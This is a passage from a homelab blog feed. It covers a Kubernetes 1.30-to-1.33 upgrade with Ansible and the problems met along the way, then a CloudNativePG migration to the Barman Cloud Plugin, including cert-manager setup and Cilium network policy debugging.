</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for OSDs to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/myuser/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd status &#34;{{ ansible_hostname }}&#34; --format json</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">register</span>: <span style="color:#ae81ff">ceph_end</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">until</span>: <span style="color:#e6db74">&#34;(ceph_end.stdout | trim | from_json | community.general.json_query(&#39;OSDs[*].state&#39;) | select(&#39;contains&#39;, &#39;up&#39;) | length) == (ceph_end.stdout | trim | from_json | community.general.json_query(&#39;OSDs[*]&#39;) | length)&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">retries</span>: <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delay</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">post_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unset osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/myuser/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd unset noout</span>
</span></span></code></pre></div><p>I&rsquo;m also setting the <code>noout</code> flag for Ceph. This ensures that Ceph doesn&rsquo;t start
automatic rebalancing when the OSDs on the upgraded host temporarily go down.
In addition, I&rsquo;m waiting for the OSDs on each host to be up again before continuing
to the next host, to prevent storage issues.</p>
<p>Last but not least are my worker nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes worker nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-workers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for one minute</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>Nothing special about these. In contrast to all the other plays, I&rsquo;m running
two hosts in parallel through it, because I do currently have enough slack in
the cluster to be able to tolerate the loss of two workers.</p>
<p>So now let me tell you how that beautiful theory I laid out up to now actually
worked in practice. &#x1f601;</p>
<h2 id="a-tale-of-three-updates">A tale of three updates</h2>
<p>I upgraded from Kubernetes 1.30 all the way to 1.33. None of the three went
through without at least one issue.</p>
<h3 id="updating-from-130-to-131">Updating from 1.30 to 1.31</h3>
<p>This one was the most complicated when it came to fixing the issue. I started
it with the previous iteration of my update playbook, which still fully updated
each control plane node in turn. So it first ran the kubeadm update on one
node and then immediately followed that up with updating the kubelet on that same
node.
Right on the first node, I was greeted with these errors for a number of the
Pods:</p>
<pre tabindex="0"><code>NAMESPACE     NAME                                             READY   STATUS                            RESTARTS      AGE
fluentbit     fluentbit-fluent-bit-km8r7                       0/1     CreateContainerConfigError        0             38m
kube-system   cilium-98hzq                                     0/1     Init:CreateContainerConfigError   0             14m
kube-system   cilium-envoy-tklh7                               0/1     CreateContainerConfigError        0             40m
kube-system   etcd-firstcp                                     1/1     Running                           2 (35m ago)   35m
kube-system   kube-apiserver-firstcp                           1/1     Running                           2 (35m ago)   35m
kube-system   kube-controller-manager-firstcp                  1/1     Running                           0             35m
kube-system   kube-scheduler-firstcp                           1/1     Running                           0             35m
kube-system   kube-vip-firstcp                                 1/1     Running                           0             35m
rook-ceph     rook-ceph.cephfs.csi.ceph.com-nodeplugin-bnmsd   0/3     CreateContainerConfigError        0             38m
rook-ceph     rook-ceph.rbd.csi.ceph.com-nodeplugin-hq82g      0/3     CreateContainerConfigError        0             38m
</code></pre><p>Note the error in the <code>STATUS</code> of all of the non-kube Pods. I had never heard
of a <code>CreateContainerConfigError</code> before, so I went to google and found
<a href="https://github.com/kubernetes/kubernetes/issues/127316">this issue</a>. It identified
the problem pretty clearly and the kubernetes maintainers helpfully pointed
to the <a href="https://kubernetes.io/releases/version-skew-policy/#kubelet">version-skew-policy</a>.
After reading said policy multiple times, I finally realized what my error was and
updated my Ansible playbook to first update all kubeadm versions on all CP nodes
and only then start updating the kubelet. I got the error fixed by just running
the kubeadm update on the other two control plane nodes as well.</p>
<p>After that, the rest of the update went through without a hitch.</p>
<h3 id="updating-from-131-to-132">Updating from 1.31 to 1.32</h3>
<p>In this one I stumbled over the fact that I hadn&rsquo;t fully understood the
release notes for 1.32, or rather their implications. Specifically, this point
in the <a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v1320">1.32 release notes</a>:</p>
<blockquote>
<p>kubeadm: kubeadm upgrade node now supports addon and post-upgrade phases. Users can use kubeadm upgrade node phase addon to execute the addon upgrade, or use kubeadm upgrade node &ndash;skip-phases addon to skip the addon upgrade. If you were previously skipping an addon subphase on kubeadm init you should now skip the same addon when calling kubeadm upgrade apply and kubeadm upgrade node. Currently, the post-upgrade phase is no-op, and it is mainly used to handle some release-specific post-upgrade tasks.</p></blockquote>
<p>So basically, addons, like kube-proxy for example, had been ignored during updates
up to this point. Which is why my updates worked up to now. But in 1.32,
the <code>kubeadm upgrade</code> command gained the ability to also update addons. And
seemingly also deploy them if they&rsquo;re not present, because I suddenly found
kube-proxy Pods on my nodes after the upgrade.</p>
<p>I did not use kube-proxy, because I was using Cilium&rsquo;s kube-proxy replacement.
I had disabled kube-proxy in my <code>InitConfiguration</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">skipPhases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;addon/kube-proxy&#34;</span>
</span></span></code></pre></div><p>But, the InitConfiguration isn&rsquo;t read during updates, and it seems that kubeadm
doesn&rsquo;t transfer this setting into the <code>kubeadm-config</code> ConfigMap during cluster
creation. So <code>kubeadm upgrade</code> didn&rsquo;t have any idea that it should be skipping
the addon, and happily deployed it on my nodes.</p>
<p>Luckily for me, it didn&rsquo;t seem to interfere with anything, and my cluster didn&rsquo;t
just collapse in on itself. I removed them all with the handy instructions from
the <a href="https://docs.cilium.io/en/stable/network/kubernetes/kubeproxy-free/#quick-start">Cilium docs</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system delete ds kube-proxy
</span></span><span style="display:flex;"><span>kubectl -n kube-system delete cm kube-proxy
</span></span></code></pre></div><p>To prevent any further issues, I edited the kubeadm-config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n kube-system configmaps kubeadm-config -o yaml
</span></span></code></pre></div><p>And added an entry <code>proxy.disabled: true</code> to it. With this, the problem did not
occur again during the subsequent 1.33 update.</p>
<h3 id="updating-from-132-to-133">Updating from 1.32 to 1.33</h3>
<p>The last one. I was hoping it would go through without an issue, to at least
have one successful update during which I could move away from the computer and
read a bit, but no such luck.</p>
<p>During the update of the cri-o repository for 1.33, I got this error:</p>
<pre tabindex="0"><code>Failed to update apt cache: E:Failed to fetch https://pkgs.k8s.io/addons:/cri-o:/stable:/v1.33/deb/InRelease  403  Forbidden [IP: 3.167.227.100 443]
</code></pre><p>This was because cri-o&rsquo;s repos moved from k8s.io to openSUSE, see for example
<a href="https://github.com/cri-o/cri-o/issues/9341">this issue</a>. The adaption was
pretty simple, I just needed to change the address in my playbook.</p>
<p>After that fix, the update ran through without any further issues and I was
finally done. Cost me almost a day of work, but alas, most of the issues were of
my own making.</p>
<h2 id="increased-memory-requests">Increased memory requests?</h2>
<p>And finally for something amusing. When I looked at my Homelab dashboard on
the morning after the upgrade, I found that the memory requests for my worker
nodes were suddenly in the red, with almost 83% of available capacity used:</p>
<p><figure>
    <img loading="lazy" src="resource-usage.png"
         alt="A screenshot of several Grafana gauge visualizations. They show the utilization of memory and CPU resource usage in my k8s cluster, as measured by looking at the total resource requests from all Pods in the cluster. There are three gauges, one for each of my node groups, &#39;Control Plane&#39;, &#39;Ceph&#39; and &#39;Workers&#39;. Interesting here are the values for the &#39;Workers&#39; group, which show 72.5% for the CPU resource consumption and 82.8% for the memory resource consumption."/> <figcaption>
            <p>Resource usage the morning after the update. This shows the sum of resource requests on Pods divided by the overall resources of the group of nodes.</p>
        </figcaption>
</figure>

Normally, the memory utilization is more around 60%.</p>
<p>Thinking that the update must have changed something in how the memory utilization
was computed, or perhaps there was some Deployment which increased memory requests
after the update, I looked through my metrics, but wasn&rsquo;t able to find anything.</p>
<p>After some additional checking, I finally found the issue in how I was computing
the values for the metric:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>      kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">memory</span>&#34;}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">and</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">unless</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{}<span style="color:#f92672">))</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">/</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>      kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">memory</span>&#34;}
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">unless</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> kube_node_spec_taint{}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">)</span>
</span></span></code></pre></div><p>So I&rsquo;m using the <code>kube_pod_container_resource_requests</code> for the <code>memory</code> resource,
but only for Pods on nodes where there is no taint. Then I divide that by the
memory capacity of all nodes which don&rsquo;t have a taint. I use this because the taint
was readily available in the Prometheus data, and my worker nodes are the only
ones which don&rsquo;t have a taint applied to them, so it made sense to use them.</p>
<p>What I did not consider: There are a few non-catastrophic taints which Kubernetes
applies, in my case the disk pressure taint. This simply happened because the disks
were getting a bit full on a few worker nodes due to the many node drains and
subsequent reschedules of Pods. So there were a lot more unused images laying
around locally than was normally the case.</p>
<p>I was quite amused with myself when I realized that I had just spend half an
hour staring at completely the wrong plots. &#x1f601;</p>
<p>And that&rsquo;s it. Here&rsquo;s to hoping that the next Kubernetes update is not interesting
enough to blog about.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating my CNPG backups to the Barman Cloud Plugin</title>
      <link>https://blog.mei-home.net/posts/cnpg-barman-plugin-migration/</link>
      <pubDate>Wed, 10 Sep 2025 20:20:56 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/cnpg-barman-plugin-migration/</guid>
      <description>This went quite nicely</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my <a href="https://cloudnative-pg.io/">CloudNativePG</a> setup to the
Barman Cloud Plugin.</p>
<p>During my migration from Nomad to Kubernetes, I started using CNPG for my database
needs. For more details, have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">this post</a>.
I configured their backup solution right away. It consists of a component which
runs in the same Pod as the main Postgres and backs up both, the Write Ahead Log (WAL)
and the full database, all while the instance is kept
up and running. Those can then be copied to an S3 bucket for long term storage.</p>
<p>This solution has been part of the main container up to now, but it looks like
the project is aiming for a more plugin-driven architecture, and their first
step was to extract this backup functionality into the <a href="https://cloudnative-pg.io/plugin-barman-cloud/">Barman Cloud Plugin</a>.
I learned about this through an entry in their <a href="https://github.com/cloudnative-pg/cloudnative-pg/releases/tag/v1.26.0">1.26 release notes</a>
back in May. In addition, they also re-organized their operand container images
at the beginning of the year. There are now <a href="https://github.com/cloudnative-pg/postgres-containers/blob/f097385908a5c51cf7fd3b513bc87f8c63b386ee/README.md#image-types">three image types</a>:</p>
<ul>
<li>minimal: Images based on Debian with only the minimum of packages to support CloudNativePG</li>
<li>standard: Minimal image, plus a few tools like PGAudit</li>
<li>system: Equivalent to the old images, but now based on the &ldquo;standard&rdquo; image and with Barman Cloud Backup still integrated</li>
</ul>
<p>As the Readme mentions:</p>
<blockquote>
<p>IMPORTANT: The system images are deprecated and will be removed once in-core support for Barman Cloud in CloudNativePG is phased out. While you can still use them as long as in-core Barman Cloud remains available, you should plan to migrate to either a minimal or standard image together with the Barman Cloud plugin—or adopt another supported backup solution.</p></blockquote>
<p>So at some point soon, running CNPG with backups without also running the
Barman Cloud Plugin will not be possible anymore.</p>
<p>What I&rsquo;m currently missing (or have completely overlooked?) are some instructions
for how to migrate from the system image to either standard or minimal. And I
strongly remember that I read that you cannot just replace the system image with
standard or minimal. But for the life of me, I can&rsquo;t find where at the moment. &#x1f926;</p>
<h2 id="preparations-cert-manager">Preparations: cert-manager</h2>
<p>For the migration, I followed <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/migration/">the official docs</a>,
and their first step is installing the Barman Cloud Plugin, documented <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/installation/">here</a>.
The install has one prerequisite, namely that it requires <a href="https://cert-manager.io/">cert-manager</a>.</p>
<p>I&rsquo;ve not been using cert-manager in my Homelab up to now, because I generally
don&rsquo;t need internal certs and my external Let&rsquo;s Encrypt cert is a wildcard cert,
which requires DNS challenges. And my current DNS host does not support any kind
of API to change DNS records, so I can&rsquo;t use cert-manager here either.</p>
<p>But now I needed it. I used <a href="https://github.com/cert-manager/cert-manager/tree/master/deploy/charts/cert-manager">the official Helm chart</a>,
following the installation docs <a href="https://cert-manager.io/docs/installation/helm/">here</a>.</p>
<p>My <code>values.yaml</code> file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">global</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">commonLables</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">cert-manager</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">crds</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">keep</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">enableCertificateOwnerRef</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">512Mi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;--logging-format=json&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">cainjector</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;--logging-format=json&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;--logging-format=json&#34;</span>
</span></span></code></pre></div><p>The limits are likely a bit high, but I like to just run a new app for a bit with
higher limits to gather a few weeks worth of metrics to determine tighter
resource requests/limits.</p>
<p>The deployment went pretty smooth, and I did not set up any <a href="https://cert-manager.io/docs/configuration/">Issuers</a>,
as the Barman Plugin manifest brings its own self-signed Issuer along, and I do
not intend to use cert-manager for anything else for now.</p>
<p>But later during the Barman Plugin deployment, I got these error messages:</p>
<pre tabindex="0"><code>  Error: 3 errors occurred:
        * Internal error occurred: failed calling webhook &#34;webhook.cert-manager.io&#34;: failed to call webhook: Post &#34;https://cert-manager-webhook.cert-manager.svc:443/validate?timeout=30s&#34;: net/http: request canceled while waiting for conne
ction (Client.Timeout exceeded while awaiting headers)
        * Internal error occurred: failed calling webhook &#34;webhook.cert-manager.io&#34;: failed to call webhook: Post &#34;https://cert-manager-webhook.cert-manager.svc:443/validate?timeout=30s&#34;: net/http: request canceled while waiting for conne
ction (Client.Timeout exceeded while awaiting headers)
        * Internal error occurred: failed calling webhook &#34;webhook.cert-manager.io&#34;: failed to call webhook: Post &#34;https://cert-manager-webhook.cert-manager.svc:443/validate?timeout=30s&#34;: net/http: request canceled while waiting for conne
ction (Client.Timeout exceeded while awaiting headers)
</code></pre><p>This indicated that the kube-apiserver was not able to talk to the webhook
cert-manager installs. I took a quick look into the Cilium firewall logs, as I
was pretty sure that my network policies were wrong.</p>
<p>For that, I first figured out on which host the webhook was running with
this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n cert-manager pods -o wide
</span></span></code></pre></div><p>Next, I needed to find the Cilium Pod responsible for that host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n kube-system | grep cilium | grep &lt;HOSTNAME&gt;
</span></span></code></pre></div><p>Then I could launch the cilium monitor:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-smjsx -- cilium monitor --type drop
</span></span></code></pre></div><p>And this was the output:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 2635, ifindex 6, file bpf_lxc.c:2127, , identity remote-node-&gt;2444: 10.8.0.108:38980 -&gt; 10.8.15.207:10250 tcp SYN
</code></pre><p>For info, <code>10.8.15.207</code> was the webhook Pod. The thing is, I thought I had
already set up the network policy for the cert-manager namespace to allow access
from the kube-apiserver:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cert-manager-kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/component</span>: <span style="color:#ae81ff">webhook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">component</span>: <span style="color:#ae81ff">kube-apiserver</span>
</span></span></code></pre></div><p>But that&rsquo;s where the drop message from the Cilium monitor comes into play,
specifically this part:</p>
<pre tabindex="0"><code>identity remote-node-&gt;2444: 10.8.0.108:38980 -&gt; 10.8.15.207:10250
</code></pre><p>First, the identity was not a Pod, but the generic <code>remote-node</code> identity. Checking
the IP, I found that it was the IP of the Cilium host interface for one of my
control plane nodes. Which makes sense, considering that the kube-apiserver runs
on the Host network, not the cluster&rsquo;s Pod network.</p>
<p>My next attempt to get the desired network policy setup was to use the
<a href="https://docs.cilium.io/en/stable/security/policy/language/#access-to-from-kube-apiserver">kube-apiserver identity</a>.</p>
<p>But that, similarly, did not work either. An explanation can be found in
<a href="https://github.com/cilium/cilium/issues/27967">this issue</a>. Namely, Cilium defines
the kube-apiserver identity from the endpoints of the <code>kubernetes</code> service in the
<code>default</code> namespace. Which, in my case, were the local network host IPs of my
three control plane nodes, not the IPs of their Cilium host interfaces. and that&rsquo;s
why that approach also did not work.</p>
<p>What I finally landed on were <a href="https://docs.cilium.io/en/stable/security/policy/language/#node-based">node identities</a>.
The final network policy looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cert-manager-kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/component</span>: <span style="color:#ae81ff">webhook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromNodes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">node-role.kubernetes.io/control-plane</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>It&rsquo;s a bit wider than I would like, as it allows all Pods which communicate
via the host interface to access the webhook. But it&rsquo;s the best I could come up
with.</p>
<h2 id="deploying-barman-cloud-plugin">Deploying Barman Cloud Plugin</h2>
<p>The deployment of the plugin itself is not too involved. The only annoying thing
is that it is only provided as an all-in-one manifest. So I took the different
manifests and transformed them into a proper Helm chart. Again, mostly copy
and paste.</p>
<p>The only issue was: How would I do updates? So in addition to the actual,
separated manifests, I also put the official all-in-one yaml file into my repo.
So when it comes time to update, I only need to overwrite the old manifest and
Git will tell me which parts I would need to update.</p>
<p>Perhaps not the most elegant solution, but I&rsquo;m pretty sure it will work just
fine.</p>
<p>Now onto the actual migration.</p>
<h2 id="migrating-my-cnpg-clusters">Migrating my CNPG clusters</h2>
<p>The migration itself needed a few manual steps, but was very straightforward
and didn&rsquo;t have any problem at all. I followed the official docs from <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/migration/">here</a>.</p>
<p>For an example, let&rsquo;s look at my Wallabag DB, which was the first one I
migrated:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
